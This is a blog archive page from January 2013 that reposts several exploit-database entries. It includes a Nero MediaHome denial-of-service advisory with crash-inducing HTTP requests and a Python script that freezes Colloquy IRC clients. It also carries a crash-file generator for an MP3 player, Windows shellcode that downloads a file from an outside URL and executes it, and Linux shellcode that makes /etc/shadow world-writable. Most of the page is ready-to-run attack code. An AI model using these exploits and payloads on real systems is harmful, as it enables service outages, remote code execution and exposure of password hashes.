Archive for 28 Ocak 2013

Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability

Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability

Product: Nero MediaHome
Vendor: Nero
Vulnerable Version(s): 4.5.8.0 and probably prior
Tested Version: 4.5.8.0 in Windows 7 SP1
Vendor Notification: November 21, 2012 
Public Disclosure: January 9, 2013 
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]
CVE References: CVE-2012-5876, CVE-2012-5877
CVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Low 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.
 
 
1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876
 
1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.
 
Crash details:
 
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 (  62040072) ->  (heap)
EBX: 003e0000 (   4063232) ->   b@>@>" (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b2b000 (  62042112) -> D (heap)
ESI: 03b2a800 (  62040064) ->  (heap)
EBP: 0526f854 (  86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 (  86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 (   4063232) ->   b@>@>" (heap)
+04: 00000022 (        34) -> N/A
+08: 003e0004 (   4063236) ->   b@>@>" (heap)
+0c: 0526f88c (  86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A
 
 
Disasm around:
 
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
 
 
 
1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.
 
Crash details:
 
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b63008 (  62271496) ->  (heap)
EBX: 003e0000 (   4063232) -> #  8@>+ (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b64000 (  62275584) -> B (heap)
ESI: 03b63000 (  62271488) ->  (heap)
EBP: 0527f864 (  86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)
ESP: 0527f858 (  86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)
+00: 003e0000 (   4063232) -> #  8@>+ (heap)
+04: 00000021 (        33) -> N/A
+08: 003e0004 (   4063236) -> #  8@>+ (heap)
+0c: 0527f89c (  86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A
 
 
Disasm around:
 
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
HEAD / [A * 265696] HTTP/1.1
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
 
 
 
1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
 
Crash details:
 
EIP: 7c920a1b cmp ecx,[edx+0x4]
EAX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBX: 003e0000 (   4063232) ->   @>+ (heap)
ECX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EDX: 03b50101 (  62193921) -> N/A
EDI: 03c1bb30 (  63028016) -> yDPyDh8yDh >>#H"G^^^^o^I@_l (heap)
ESI: 03c1bb88 (  63028104) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBP: 033bfc78 (  54262904) -> L;L (stack)
ESP: 033bfc6c (  54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)
+00: 003e0000 (   4063232) ->   @>+ (heap)
+04: 03c1bb78 (  63028088) ->  >>#H"G^^^^o^I@_lhf19fPf36dLa (heap)
+08: 00000000 (         0) -> N/A
+0c: 033bfd4c (  54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)
+10: 7c92084c (2089945164) -> N/A
+14: 03adb908 (  61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)
 
 
Disasm around:
 
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
0x7c920a3c cmp eax,ecx
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
OPTIONS / [A * 265712]
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.host.com
 
 
 
1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. 
 
Crash details:
 
EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 (  63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 (   4063232) ->   Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 (  63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 (  63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 (  86505512) -> `' (stack)
ESP: 0527f81c (  86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
+00: 003e0000 (   4063232) ->   Tp@>+ (heap)
+04: 00000021 (        33) -> N/A
+08: 003e0004 (   4063236) ->   Tp@>+ (heap)
+0c: 0527f860 (  86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 03ad5600 (  61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)
 
 
Disasm around:
 
0x7c9209f8 jnz 0x7c95af5f
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]
 
 
 
2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877
 
2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.
 
Crash details:
 
EIP: 10003171 mov [eax+0x18],ebp
EAX: 00000000 (         0) -> N/A
EBX: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
ECX: 039cddea (  60612074) -> localhost (heap)
EDX: 039cddea (  60612074) -> localhost (heap)
EDI: 037bc888 (  58443912) -> ||{sP@OQ6E}{AY+ (heap)
ESI: 037c7fb0 (  58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
EBP: 00000009 (         9) -> N/A
ESP: 0563fad0 (  90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
+00: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
+04: 039cdde8 (  60612072) ->  localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
+08: 00000000 (         0) -> N/A
+0c: 00000001 (         1) -> N/A
+10: 000000b8 (       184) -> N/A
+14: 037c7318 (  58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)
 
 
Disasm around:
 
0x10003156 mov edx,[esi+0x8]
0x10003159 mov ebp,[esi+0xc]
0x1000315c push byte 0x1
0x1000315e push eax
0x1000315f push ecx
0x10003160 push ebx
0x10003161 mov [edi+0x40],esi
0x10003164 mov [esp+0x2c],edx
0x10003168 call 0x10002730
0x1000316d mov ecx,[esp+0x2c]
0x10003171 mov [eax+0x18],ebp
0x10003174 mov ebp,[esp+0x24]
0x10003178 add esp,0x10
0x1000317b mov [eax+0x14],ecx
0x1000317e mov edx,[ebp+0x8]
0x10003181 test edx,edx
0x10003183 mov [esp+0x14],edx
0x10003187 jnz 0x10002ff0
0x1000318d mov eax,[esp+0x24]
0x10003191 push eax
0x10003192 call 0x10002c20
 
 
Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:
 
GET / HTTP/1.1
: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."
 
As a temporary solution it is advised to remove the vulnerable application from your system.
 
-----------------------------------------------------------------------------------------------

Colloquy 1.3.5 / 1.3.6 Denial Of Service Vulnerability

Colloquy 1.3.5 / 1.3.6 Denial Of Service Vulnerability

#!/usr/bin/python3
###################################################################################
#                                                       Wednesday, January 09, 2013
#
#
#
#                    _  _  .__                .__               
#                 __| || |_|  |   ____   ____ |__| ____   ____  
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#                
#
#             -=[ Colloquy - A Mac OS X Internet Chat client. ] =-
#          
#                  [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
#                                                           #      T E A M        #
#                                                           #######################
#
#  UberLame .......> Provided exploit discovery + payloads
#  Aph3x    .......> Provided main payload attack for this demostration. <3
#       O_O      .......> Built the concept in Python3
#  Apetrick .......> Allowed testing of the exploit against his ipod
#  syk      .......> Allowed testing of the exploit against his iphone5
#
#
###################################################################################
#  SUMMARY     #
################
# 
# This DOS is designed to freeze the client making it impossible to do anything
# with it. The user will need to manually restart the application in order to
# continue using it.
#
# There are over a few dozen ways to crash the Colloquy client, however, we
# will only be showing 3 various methods. These glitches were suppose to be
# fixed in 'Colloquy' 1.3.5, however, they still exist in the lastest release
# of 1.3.6...
#
################
#  VULNERABLE  #
################
#
#   Colloquy 1.3.5 (5534) - iPhone OS 5.1.1 (ARM) - http://colloquy.mobi
#  Colloquy 1.3.6 (5575) - iPhone OS 6.0.2 (ARM) - http://colloquy.mobi
#
################
#  PATCH       #
################
#
#  There is no CVE reported.
#
################
#  PATCH       #
################
#
#  There is no PATCH available.
#
###################################################################################
#                          #                     #
#                          #    H O W - T O      #
#                          #                     #
#                          #######################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# the payload...
#
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
#
###################################################################################
from argparse import ArgumentParser
from time import sleep
import socket
 
 
shellcode = {
# One Shot <3
'one_shot'  : [ \
"687474703a2f2f782f2e2425235e26402426402426232424242425232426",
"23242623262340262a232a235e28242923404040245e2340242625232323",
"5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
"2e24" ],
 
# 1.3.5 
'1_3_5'    : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
 
# 1.3.6 - ( Requires Sending 25 Times )
'1_3_6'    : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
}
 
def own( sock, target, sc_key='one_shot' ):
sc = ''.join( shellcode[sc_key] )
targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) )
 
msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
 
if sc_key not in '1_3_6':
sock.send( bytes.fromhex( msg ) )
else:
try:
for x in range( 1, 26 ):
sock.send( bytes.fromhex( msg ) )
sleep( .64 )
except:
print( 'FAILED!')
 
 
def connect( uri, port, target, sc_key ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
sock.recv(8096)
except:
print( "\t[-] Failed To Connect To {}".format( uri ) )
exit()
 
 
sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" ) 
sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" )
 
while True:
host_data = str( sock.recv( 8096 ).strip() )
 
 
if ' 396 ' in host_data:
print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) )
own( sock, target, sc_key )
sock.send( b'QUIT\r\n' )
sock.close()
break
 
 
try: 
msg = host_data.split()
if msg[0].lower() is 'ping':
sock.send( b"PONG {}\r\n".format( msg[1] ) )
continue
except:
pass
 
 
print( '\t[!] Payload Sent, Target Should Drop Shortly <3' )
 
 
 
if __name__ == '__main__':
parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )
 
parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )
 
parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot',
help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )
 
 
 
args = parser.parse_args()
 
if args.nick is None:
parser.print_help()
exit()
 

BestPlayRadio v1.0 (.mp3) Crash PoC

BestPlayRadio v1.0 (.mp3) Crash PoC

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#     _                   __           __       __                     #
#   /' \            __  /'__`\        /\ \__  /'__`\                   #
#  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           #
#  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          #
#     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           #
#      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           #
#       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           #
#                  \ \____/ >> Exploit database separated by exploit   #
#                   \/___/          type (local, remote, DoS, etc.)    #
#                                                                      #
#  [+] Site            : 1337day.com                                   #
#  [+] Support e-mail  : submit[at]1337day.com                         #
#                                                                      #
#               #########################################              #
#               I'm The Black Devils member from Inj3ct0r Team         #
#               #########################################              #
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
# Exploit Title: BestPlayRadio  v1.0 (.mp3) Crash PoC
# Version: 4.1
# Date: 2012-01-09
# Software Link: http://www.procesualitatea.ro/bestplay/BestPlayRadio.html
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / Newbie3viLc063s / All DZ Hackerz
 
#!/usr/bin/python
 
file="Dz.mp3"
crash="\x41" * 10000
try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write(crash)
writeFile.close()
print "[*] File successfully created!"
except:
print "[*] Error while creating file!"
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

/*
Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
Date: 2013-22-01
Author: RubberDuck
Web: http://bflow.security-portal.cz
http://www.security-portal.cz
Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64)
-- file is downloaded from URL http://bflow.security-portal.cz/down/xy.txt
-- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/
-- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode"
and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<"
 
*/
 
#include <windows.h>
#include <stdio.h>
 
int main(){
unsigned char shellcode[] =
"\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B"
"\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53"
"\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72"
"\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81"
"\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04"
"\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64"
"\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3"
"\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3"
"\x8B\x14\x8E\x03\xD3\x33\xC9\x51\x68\x2E"
"\x65\x78\x65\x68\x64\x65\x61\x64\x53\x52"
"\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62"
"\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2"
"\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C"
"\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C"
"\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24"
"\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33"
"\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64"
"\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C"
"\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24"
"\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83"
"\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68"
"\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57"
"\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D"
"\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A"
"\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03"
"\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69"
"\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF"
"\xFF\xFF"
// http://bflow.security-portal.cz/down/xy.txt
"\x68\x74\x74\x70\x3A\x2F\x2F\x62"
"\x66\x6C\x6F\x77\x2E\x73\x65\x63\x75\x72"
"\x69\x74\x79\x2D\x70\x6F\x72\x74\x61\x6C"
"\x2E\x63\x7A\x2F\x64\x6F\x77\x6E\x2F\x78"
"\x79\x2E\x74\x78\x74\x00";
 
LPVOID lpAlloc = NULL;
void (*pfunc)();
 
lpAlloc = VirtualAlloc(0, 4096,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
 
if(lpAlloc == NULL){
printf("Memory isn't allocated!\n");
return 0;
}
 
memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);
 
pfunc = (void (*)())lpAlloc;
 
pfunc();
 
return 0;
}
 

linux/x86 execve-chmod 0777 /etc/shadow 58 bytes shellcode

linux/x86 execve-chmod 0777 /etc/shadow 58 bytes shellcode

***************************************************************
* Linux/x86 execve-chmod 0777 /etc/shadow  58 bytes 
***************************************************************
* Author: Hamza Megahed                             
***************************************************************
* Twitter: @Hamza_Mega                              
***************************************************************
* blog: hamza-mega[dot]blogspot[dot]com             
***************************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com        
***************************************************************
 
xor    %eax,%eax
push   %eax
pushl  $0x776f6461
pushl  $0x68732f2f
pushl  $0x6374652f
movl   %esp,%esi
push   %eax
pushl  $0x37373730
movl   %esp,%ebp
push   %eax
pushl  $0x646f6d68
pushl  $0x632f6e69
pushl  $0x622f2f2f
mov    %esp,%ebx
pushl  %eax
pushl  %esi
pushl  %ebp
pushl  %ebx
movl   %esp,%ecx
mov    %eax,%edx
mov    $0xb,%al
int    $0x80
 
********************************
#include <stdio.h>
#include <string.h>
 
char *shellcode = 
"\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73"
"\x68\x68\x2f\x65\x74\x63\x89\xe6\x50\x68\x30\x37"
"\x37\x37\x89\xe5\x50\x68\x68\x6d\x6f\x64\x68\x69"
"\x6e\x2f\x63\x68\x2f\x2f\x2f\x62\x89\xe3\x50\x56"
"\x55\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
 
 
 
 
 
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}